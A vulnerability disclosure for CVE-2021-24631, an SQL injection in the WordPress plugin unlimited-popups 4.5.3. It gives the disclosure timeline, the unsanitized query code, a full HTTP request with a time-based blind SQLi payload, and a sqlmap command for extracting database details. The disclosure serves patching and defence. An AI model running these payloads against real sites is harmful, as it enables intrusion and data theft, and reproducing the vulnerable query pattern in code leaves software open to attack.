Plugin Details
Plugin Name: wp-plugin : unlimited-popups
Effected Version : 4.5.3 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Editor
CVE Number : CVE-2021-24631
Identified by : Shreya Pohekar
Disclosure Timeline
-
June 15, 2021: Issue Identified and Disclosed to WPScan
- June 22, 2021 : Plugin Closed
- August 13, 2021 : CVE Assigned
- October 7, 2021 : Public Disclosure
Technical Details
The delete popup feature available to Editor and Administrator role, takes in GET parameter did and inserts it into the SQL statement without proper sanitization, validation or escaping therefore leading to SQL Injection.
Vulnerable Code: popuplist.php#L16
15: $delid = $_GET["did"];
16: $wpdb->query("delete from " . $table_name . " where id=" . $delid);
PoC Screenshot
Exploit
GET /wp-admin/admin.php?page=popup&info=del&did=1 AND (SELECT 4420 FROM (SELECT(SLEEP(5)))yVXX) HTTP/1.1
Host: 172.28.128.50
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://172.28.128.50/wp-admin/admin.php?page=popup
Connection: close
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7Cd369b0fc734febbd56e02a2729ea1e89ed8bdef88858aa2bf66244e80af40313; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7C52b09dc0a0cd88faff03e9a9bce98b1cace6dcf841b17fe668c52d49083ff760; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist%26mfold%3Do%26widgets_access%3Doff; wp-settings-time-1=1623063303
Upgrade-Insecure-Requests: 1
SQLMap Command
sqlmap -r popup.req --dbms mysql --current-user --current-db -b -p did --batch --flush-session